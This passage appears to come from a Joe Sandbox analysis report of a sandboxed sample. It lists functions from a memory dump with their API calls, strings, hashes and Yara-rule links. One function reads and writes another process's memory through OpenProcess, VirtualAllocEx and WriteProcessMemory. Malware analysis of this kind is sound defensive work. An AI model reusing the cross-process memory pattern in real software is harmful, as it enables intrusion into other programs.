StrokeAndFillPath.GDI32(?,?,00A2BBC9,00000000,?), ref: 009F17B7
SelectObject.GDI32(?,00000000), ref: 009F17CA
DeleteObject.GDI32 ref: 009F17DD
StrokePath.GDI32(?), ref: 009F17F8

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: bbe7f1eb3355e8ccc571119d53b51310a992044f9ab54218262375235a1e7515
Instruction ID: 0ec59c3cafabf0ac0b7049b9f316f9edb3dfb9e2b266554e82d02fe1d6e21555
Opcode Fuzzy Hash: bbe7f1eb3355e8ccc571119d53b51310a992044f9ab54218262375235a1e7515
Instruction Fuzzy Hash: 80F0B230008608EBDB55EFE6EC4CF693BA9AB40326F148314E92D551F1C7B589DADF90

Function 00A5C9DA Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00A5CA75
CoCreateInstance.OLE32(00A83D3C,00000000,00000001,00A83BAC,?), ref: 00A5CA8D

Part of subcall function 00A01A36: _memmove.LIBCMT ref: 00A01A77

CoUninitialize.OLE32 ref: 00A5CCFA

Strings

.lnk, xrefs: 00A5CA09, 00A5CA31, 00A5CA3B

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: aa8863c4b293181325b19773820bc157082749f462926dcac76ec61086560458
Instruction ID: 3260bad6925a620096a5b69c899fef476e4cd75b425b849eda920adb20ad4f90
Opcode Fuzzy Hash: aa8863c4b293181325b19773820bc157082749f462926dcac76ec61086560458
Instruction Fuzzy Hash: 28A11A71104209AFD300EF64DC91EABB7E8FF94758F00491CF655972A2EB70EA49CB92

Function 009FE3C6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00A10FE6: std::exception::exception.LIBCMT ref: 00A1101C
Part of subcall function 00A10FE6: __CxxThrowException@8.LIBCMT ref: 00A11031

Part of subcall function 00A01A36: _memmove.LIBCMT ref: 00A01A77

Part of subcall function 00A01680: _memmove.LIBCMT ref: 00A016DB

__swprintf.LIBCMT ref: 009FE598

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 009FE431

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 7d2b068a534c3a4915c933c098b8517dccc66e4a99a4ef956367d00849efe487
Instruction ID: ffd20ab144cae9af594aefe6d2f5dfa338c4748ed2222b9085ff05ad2e0cfb7b
Opcode Fuzzy Hash: 7d2b068a534c3a4915c933c098b8517dccc66e4a99a4ef956367d00849efe487
Instruction Fuzzy Hash: 07919E715082099FC714EF28D996CBFB7B8EF95710F04091DF5869B2A1EB20EE44CB92

Function 00A1523D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00A152CD

Part of subcall function 00A20320: __87except.LIBCMT ref: 00A2035B

Strings

pow, xrefs: 00A152A5, 00A152C2

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: b80f6599b29e8fb40da27d0523ff1e339e74e84b14254f2d2e4ef2b861a8d7ce
Instruction ID: 46fece90cc5ad7e6d4e4c76ab05e3e7109b1233e08150d8736bcc7d347c048d4
Opcode Fuzzy Hash: b80f6599b29e8fb40da27d0523ff1e339e74e84b14254f2d2e4ef2b861a8d7ce
Instruction Fuzzy Hash: 51515D72D09601C7CB11F73CEA517EA6BA49B80750F308978E4D18A1EBEF788CC59B46

Function 00A10654 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

#, xrefs: 00A10699
+, xrefs: 00A10690

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 481be1ce10480133db4c115583203decef6fd568c650c93077d959a1745b6f70
Instruction ID: 10de720877f0e8b3e289f589a3df30041c03f799d9db122f95373c866e243e5c
Opcode Fuzzy Hash: 481be1ce10480133db4c115583203decef6fd568c650c93077d959a1745b6f70
Instruction Fuzzy Hash: 4F510179904255CFDF25DF68C880AFA7BB4EFAA310F144055EC91AB2D0D774AC82CB62

Function 00A0CF0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A0CFC2
_memmove.LIBCMT ref: 00A0D060
_memset.LIBCMT ref: 00A0D084

Strings

ERCP, xrefs: 00A0CF2D

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 2313fd42266a4dbdcd7413a2ad732284accf699a87778fa39fef78bf83edea3e
Instruction ID: f44bb883746af40a0a9f4bea27c27043b724dd20e6cedf2db87862adcecd4853
Opcode Fuzzy Hash: 2313fd42266a4dbdcd7413a2ad732284accf699a87778fa39fef78bf83edea3e
Instruction Fuzzy Hash: AF51D4B2A007099FDB24CFA4D8817AABBF4EF44311F24856EE54ADB290E770D585CB40

Function 00A4A3AD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 122windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A51CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A49E4E,?,?,00000034,00000800,?,00000034), ref: 00A51CE5

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00A4A3F7

Part of subcall function 00A51C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00A49E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00A51CB0

Part of subcall function 00A51BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00A51C08
Part of subcall function 00A51BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00A49E12,00000034,?,?,00001004,00000000,00000000), ref: 00A51C18
Part of subcall function 00A51BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00A49E12,00000034,?,?,00001004,00000000,00000000), ref: 00A51C2E

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A4A464
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00A4A4B1

Strings

@, xrefs: 00A4A4C9

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: 48172164ccd11ab0775efe0f435f6b268945eba7a3cebc6dd7c76086d925f61f
Instruction ID: c90b14de7fd55418954c0317f58878ed0b89669f6780a25031a22cb77dfef1cd
Opcode Fuzzy Hash: 48172164ccd11ab0775efe0f435f6b268945eba7a3cebc6dd7c76086d925f61f
Instruction Fuzzy Hash: 19412A7694121CBFDB10DBA4CD85BEEBBB8EF49300F104095FA55B7180DA716E89CBA1

Function 00A779FE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00A77A86
SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00A77A9A
SendMessageW.USER32(?,00001002,00000000,?), ref: 00A77ABE

Strings

SysMonthCal32, xrefs: 00A77A51

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: e145993a2820e02d83cbe4225265d50de866648256000d0bbef5e463ba7905bc
Instruction ID: 688c2a4b6138332e0833d8c6157b7fdd8cc172eef8a5b114d4fa8d5076934845
Opcode Fuzzy Hash: e145993a2820e02d83cbe4225265d50de866648256000d0bbef5e463ba7905bc
Instruction Fuzzy Hash: 6221A332654218BFEF11CF94CC46FEE3B69EF48764F118214FE196B1D0DAB1A8558BA0

Function 00A781B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00A7826F
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00A7827D
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00A78284

Strings

msctls_updown32, xrefs: 00A781E9

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 5565719789031a2b9a290704ee9d2bc3d6f4198ebaa7ae91eca36c03beaae460
Instruction ID: 06e551bf410c9b3aea69fef2f5cffb7f24a4f0b70059bc428206ffe5b0b8221b
Opcode Fuzzy Hash: 5565719789031a2b9a290704ee9d2bc3d6f4198ebaa7ae91eca36c03beaae460
Instruction Fuzzy Hash: 572181B1604208AFDB00DF54CC85DAB37EDEF99364B048159FA159B262CB71EC51CBA0

Function 00A772D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00A77360
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00A77370
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00A77395

Strings

Listbox, xrefs: 00A7732D

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: b0c5af472680dfdcd29d9eb1fb254b89fcb154af5c07c4a6961c8b70c80c91bb
Instruction ID: 1555122a16cad9808f211d0f81a60dff4c4c642e1518a8a70efc6eb0e605137f
Opcode Fuzzy Hash: b0c5af472680dfdcd29d9eb1fb254b89fcb154af5c07c4a6961c8b70c80c91bb
Instruction Fuzzy Hash: 7F219232614118BFEF128F54CC85FBF37AAEF89764F11C124F9189B190D671AC519BA0

Function 00A77D33 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00A77D97
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00A77DAC
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00A77DB9

Strings

msctls_trackbar32, xrefs: 00A77D6E

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 5a905a4956df6ef579ffcda83c38cad49ca433ee2ca207b42431cb6ff48c785c
Instruction ID: 9643508adde6c2e23ae84741d8c02bd5ec76e0946792744fbdf7a4a2d3fd3be2
Opcode Fuzzy Hash: 5a905a4956df6ef579ffcda83c38cad49ca433ee2ca207b42431cb6ff48c785c
Instruction Fuzzy Hash: 7A11E372244208BEEF209F64CC05FEB37A9EF89B64F118518FA45A60A1D672A851DB20

Function 00A6C6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00A3027A,?), ref: 00A6C6E7
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00A6C6F9

Strings

GetSystemWow64DirectoryW, xrefs: 00A6C6F3
kernel32.dll, xrefs: 00A6C6E2

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 1641d0825dad036d30d834b464360b7c753c841659c940c931f2bda0ba6072bd
Instruction ID: a7d84471c702cee9f4e4ce7eb7933a6509ee99cb9ddb516a13fb8838f226066f
Opcode Fuzzy Hash: 1641d0825dad036d30d834b464360b7c753c841659c940c931f2bda0ba6072bd
Instruction Fuzzy Hash: 1FE017B9620713AFD7609B69DC4DF6676E8FF04765B90882AE8E5D2250E770D8848F20

Function 00A04BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00A04AF7,?), ref: 00A04BB8
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A04BCA

Strings

Wow64RevertWow64FsRedirection, xrefs: 00A04BC4
kernel32.dll, xrefs: 00A04BB3

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 94ede0781fdb86105768bbcde6def2f9c9a7d7126a7e95d732819a6c366cc1d8
Instruction ID: f2f018461f28e1e8b16c1da68e9332001433969c680add0c38c1dc1dffb8aeb0
Opcode Fuzzy Hash: 94ede0781fdb86105768bbcde6def2f9c9a7d7126a7e95d732819a6c366cc1d8
Instruction Fuzzy Hash: 37D017B0510B129FD7209F71EC08B0B76E5BF0A761F119C6AD886D6594EB70D884CB11

Function 00A04B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00A04B44,?,00A049D4,?,?,00A027AF,?,00000001), ref: 00A04B85
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A04B97

Strings

Wow64DisableWow64FsRedirection, xrefs: 00A04B91
kernel32.dll, xrefs: 00A04B80

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 1af47b542c9d0cbe60f07dd10ae9b70a5d0998f801466835d057e26c678a9b2b
Instruction ID: 5ce56c886be1aef027af25e71cfd02693971f411041a8501bf83d12a9532b6ad
Opcode Fuzzy Hash: 1af47b542c9d0cbe60f07dd10ae9b70a5d0998f801466835d057e26c678a9b2b
Instruction Fuzzy Hash: 60D017B05107129FD720AF71EC18B0A76E4BF0A761F518C2AD486E2590E770E884CB10

Function 00A71447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00A71696), ref: 00A71455
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00A71467

Strings

advapi32.dll, xrefs: 00A71450
RegDeleteKeyExW, xrefs: 00A71461

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: fa0b1fd1dec11ad39cce2673c413685df822776bded08e59f84cb85a4cf5faa5
Instruction ID: 14f37cb54ddb2a6ccf137d68b1c1bc92d262557667b6e0843b988a73e563d8e7
Opcode Fuzzy Hash: fa0b1fd1dec11ad39cce2673c413685df822776bded08e59f84cb85a4cf5faa5
Instruction Fuzzy Hash: DDD01770510712AFE7209FB9CC0CB4676E4AF067A5B11CD2A94DAD35A0EB70D8C4CB50

Function 00A055F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00A05E3D), ref: 00A055FE
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00A05610

Strings

kernel32.dll, xrefs: 00A055F9
GetNativeSystemInfo, xrefs: 00A0560A

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 8f34466546cee424fd8c997668964db6d5fdd30ce407644cdeaee2ece6a8238e
Instruction ID: bbd6a14efc4252a228e9474b1a117171ce17a0e677835e41fa08a2adf6a0de2f
Opcode Fuzzy Hash: 8f34466546cee424fd8c997668964db6d5fdd30ce407644cdeaee2ece6a8238e
Instruction Fuzzy Hash: 17D01774D20B129FE760AF71D818A1776E4AF04765F5A8C2AD486D2191E674C884CB54

Function 00A697CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00A693DE,?,00A80980), ref: 00A697D8
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00A697EA

Strings

GetModuleHandleExW, xrefs: 00A697E4
kernel32.dll, xrefs: 00A697D3

Memory Dump Source

Source File: 0000000A.00000002.2690890803.00000000009F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 009F0000, based on PE: true

Associated: 0000000A.00000002.2690874240.00000000009F0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000A80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2690939963.0000000000AA6000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691001317.0000000000AB0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2691020753.0000000000AB9000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_9f0000_Introduces.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: d3c98470dc50bf2ceb53e54529e96687e29819cd0515695f6beb387afe1bdf85
Instruction ID: 9fc5ad6f9f45a7dae43ca2182d11c4731235bc428501e274909a556c1cd608f6
Opcode Fuzzy Hash: d3c98470dc50bf2ceb53e54529e96687e29819cd0515695f6beb387afe1bdf85
Instruction Fuzzy Hash: B3D017705207139FD720AF71D888A06B6E8BF09BA1B118C2AD486E2190EB70C884CB12

Function 00A47D9B Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

